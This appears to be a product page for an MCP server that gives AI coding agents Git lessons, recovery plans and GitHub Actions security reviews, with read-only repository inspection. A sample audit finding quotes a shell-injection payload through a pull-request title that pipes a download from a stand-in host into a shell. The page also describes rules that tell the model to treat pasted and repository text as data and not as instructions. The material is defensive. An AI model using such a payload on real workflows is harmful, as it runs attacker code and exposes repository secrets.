AI coding agents are good at writing Git commands and bad at knowing which ones will lose your
work. The Modern Git Academy MCP server closes that gap: it gives an agent the Academy’s
300 lessons and 20 labs as searchable, citable material, explains every
command with a risk level, plans recoveries step by step, reviews GitHub Actions workflows for the
mistakes that get repositories compromised, and — on your own machine — inspects repositories
without ever writing to them.
It speaks the Model Context Protocol, so it works with Claude
Code, Claude Desktop and any other MCP client. It is open source under the MIT licence.
A timed plan of lessons and labs, or the next lesson after the ones you finished
Fourteen tools in all, plus academy:// resources for every indexed page and seven prompt
templates (learn-git, troubleshoot-git, recover-git-history, review-github-actions,
secure-my-repository, design-branching-strategy, review-gitops-repository).
The pasted output is handed to the model inside a data boundary — the server tells the agent
that terminal text and repository strings are never instructions.
Prompt:I ran git branch -D feature/checkout and it had two days of work.
The agent calls plan_git_recovery and walks you through the plan; steps that can lose data are
marked and require your confirmation before the agent suggests them.
Recovery plan: Restore a deleted branch
Precondition: The deletion happened in this clone, or the branch existed on the remote
(then `git fetch` may bring it back).
At risk: Nothing; the commits still exist until the reflog expires (default 30–90 days).
1. Find the tip [read-only]
$ git reflog --date=iso | grep -i "<branch-name>"
Git also printed "Deleted branch X (was <sha>)" at deletion time — that sha is the tip.
2. If nothing in reflog, list unreachable commits [read-only]
pull_request_target runs with the base repository's secrets and a write token; checking out
the PR head and running anything from it (install scripts, tests) hands both to the fork.
→ Use `pull_request` for anything that executes PR code. If pull_request_target is required
(labels, comments), never check out or execute the PR head; split into a two-workflow pattern.
- [critical] MGA-A090 Untrusted input interpolated into a shell script @ job "test" step 2 (line 10)
evidence: ${{ github.event.pull_request.title }}
github.event.pull_request.title is attacker-controlled. The expression is substituted *before*
the shell parses the script, so `"; curl evil | sh; #` runs.
→ Pass the value through an environment variable (`env: TITLE: ${{ … }}`) and reference
`"$TITLE"` in the script.
The remaining findings cover the missing permissions: block, the mutable @v4 tag, the missing
timeout-minutes and concurrency, and persist-credentials. Each points at the lesson that
explains it, such as Injection, pull_request_target and Hardening.
The academy:// URIs are MCP resources: a client can read any lesson directly, and the text
arrives inside an <academy-content> boundary so the model treats it as reference material.
One module spawns git, always with an argument array, only for an allow-list of read-only
subcommands (status, log, reflog show, branch --list, remote -v, config --get, …),
with timeouts and output caps. There is no code path that runs reset, push, clean,
rebase or gc.
Risk labels and confirmation gates
Every command the server describes carries a risk level. Destructive steps in a recovery
plan are marked requiresConfirmation, and the prompts tell the agent to stop and ask.
Secrets never leave the machine
The security audit reports credential patterns as path:line plus pattern type — never the
value. Remote URLs, git output and logs are redacted. Nothing is uploaded.
Content is data, not instructions
Lesson text, pasted output and repository strings are wrapped in explicit boundaries, and
the server’s instructions tell the model not to follow anything inside them.
The index is built from the site’s public sitemap and content manifest — the same sources search
engines read — so it covers every published lesson, lab, session, challenge, learning path,
command reference and article, with each page’s pillar, difficulty, reading time and the Git
commands it teaches. Rebuilding is incremental: pages whose lastmod has not changed are skipped.
Frequently asked questions
What is MCP?
The Model Context Protocol is an open standard that lets an AI application (Claude Code, Claude Desktop, Cursor, VS Code and others) call external tools, read resources and use prompt templates from a separate server. This server exposes the Academy's content and a set of Git and GitHub reviewers as those tools.
Does the server ever change my repository?
No. It spawns git only with argument arrays — never a shell string — and only for an allow-list of read-only subcommands. Commands that could lose work are described with a risk level and a confirmation flag; the server has no way to execute them.
Can it see my code?
In local mode it reads repository metadata (branches, status, commit messages, config, file paths, diff statistics) and scans tracked text files for credential patterns, reporting only path, line and pattern type. File contents are never returned to the model, and nothing is uploaded anywhere.
What is the difference between local and remote mode?
Local mode runs over stdio on your machine and includes the repository-inspection tools. Remote mode runs over Streamable HTTP and never registers those tools — the capability is computed from the transport, so a remote server cannot list them even if the flag is set.
Is it free? Do I need an account?
Yes, and no. The server is MIT-licensed and works without any Academy account. Product mentions are off by default and, when enabled by whoever runs the server, only name a page URL.
Is it on npm?
Not yet. Until the npm release the server is built from source, which takes a few minutes: install, build, and run the indexer once.
Git Command AtlasThe command reference the server draws on, organised by task with cautions.